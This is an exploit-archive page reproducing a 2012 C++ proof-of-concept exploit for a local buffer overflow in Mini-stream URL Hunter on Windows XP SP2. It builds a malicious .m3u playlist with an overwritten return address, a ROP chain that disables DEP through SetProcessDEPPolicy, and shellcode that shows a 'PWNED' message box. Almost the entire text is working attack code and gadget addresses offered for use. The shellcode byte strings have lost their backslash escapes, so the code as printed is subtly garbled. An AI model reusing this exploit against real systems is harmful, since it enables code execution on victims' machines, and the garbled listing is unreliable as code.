URL Hunter Buffer Overflow DEP Bypass

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : URL Hunter Buffer Overflow DEP Bypass
# Published : 2012-06-21
# Author :
# Previous Title : Windows Escalate Task Scheduler XML Privilege Escalation
# Next Title : wicd Local Privilege Esclation Exploit
/*######################################################################
 Exploit Title: URL Hunter buffer overflow DEP Bypass
 Author: Ayrbyte
 Vendor or Software Link: Mini-stream Software
 Link : http://mini-stream.net/url-hunter/
 Version: 3.1.2.1
 Category: local
 Tested on: Windows XP sp 2
 Code : c++
 Fb : /Ayrbyte
########################################################################
Greetz To : 
    XerkusR, Kira, 3|_^^1x, WPFr, C-byte, H4mz_JR, Ch0lise7en, R31tuz
    Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
    Zet Dot Exe, Gabby X-Friends, Valcon Trignome 
    and all CREMY & b-compi family
######################################################################*/
//NOTE: Path Ayrbyte.m3u must be on the c://Ayrbyte.m3u
#include <cstdio>
#include <iostream>
using namespace std;
int main(){
char header[] = "http://";
char buff[] = "x41";
char eip[] = "x16x10x9cx7c";//#retn |SHELL32.dll
char nop[] = "x90";
//call MessageBoxA "PWNED by Ayrbyte...! ^_^"
char code[] =
"xB8x36xC6x0Dx10" //#MOV EAX,100DC636
"xB9xFFxFFxFFx0F" //#MOV ECX,0FFFFFFF
"xBAxFFxFFxFFx0F" //#MOV EDX,0FFFFFFF
"x2BxC1x2BxD1x52" //#SUB EAX,ECX #SUB EDX,ECX #PUSH EDX
"x50x90x90x90x90" //#PUSH EAX #NOP #NOP #NOP #NOP
"x90x50x90x90x90" //#NOP #PUSH EAX #NOP #NOP #NOP
"x90x52x90"         //#NOP #PUSH EDX #NOP
"xE8xD5x3ExCAx77" //<---CALL USER32.MessageBoxA
//string "PWNED By Ayrbyte...! ^_^"
"x20x50x57x4Ex45x44x20x42x79x20x41x79"
"x72x62x79x74x65x2Ex2Ex2Ex21x20x5Ex5Fx5E";
//SetProcessDEPPolicy
char rop[] = 
"x41x41x41x41" //agar mengarah ke esp
"x42x02x9Fx7C" //#pop ebx #retn |shell32.dll
"xFFxFFxFFxFF" //<--akan di taruh di ebx
"xD8x85xA4x7C" //#inc ebx #retn |shell32.dll
"xAFxCFxA4x7C" //#pop ebp #retn |shell32.dll
"xA4x22x86x7C" //#<- SetProcessDEPPolicy, ke EBP
"xCAx2ExAEx7c" //#pop edi #retn |shell32.dll
"xCBx2ExAEx7C" //#retn |shell32.dll
"xFEx2ExAEx7C" //#pop esi #retn |shell32.dll
"xCBx2ExAEx7C" //#retn |shell32.dll
"x01x4Ex9Ex7C" //#xor eax,eax #retn |shell32.dll
"x1DxC9x91x7C" //#xor ecx,ecx #retn |ntdll.dll
"x8Ex09xF3x77" //#xor edx,edx #retn |gdi32.dll
"x65x82xA5x7C";//#jmp esp |shell32.dll 
//Make Exploit File
FILE *teksfile;
teksfile = fopen("c:\Ayrbyte.m3u", "w");
fputs(header, teksfile);
for(int i=0; i < 17417; i++){fputs(buff, teksfile);}
fputs(eip, teksfile);
fputs(rop, teksfile);
for(int i=0; i < 28; i++){fputs(nop, teksfile);}
fputs(code, teksfile);
fclose(teksfile);
return 0;}
/*###############################################################
#we are CREMY          ##########       ###### ###### ##   ##
#we are unity          ##        ###### ##  ## ##  ##  ##  ##
#we love peace         ## ###### ##     ##  ## ##  ##   ## ##
#we crazy but not lazy ## ##  ## ########### ####  ##    ####
#what about you...?    ## ###### ##     ##         ##     ###
#be crazy now...!      ## ## ##  ###### ##         ##      ##
##################################     ##         ##      ##
                          ##  ##    #######################   */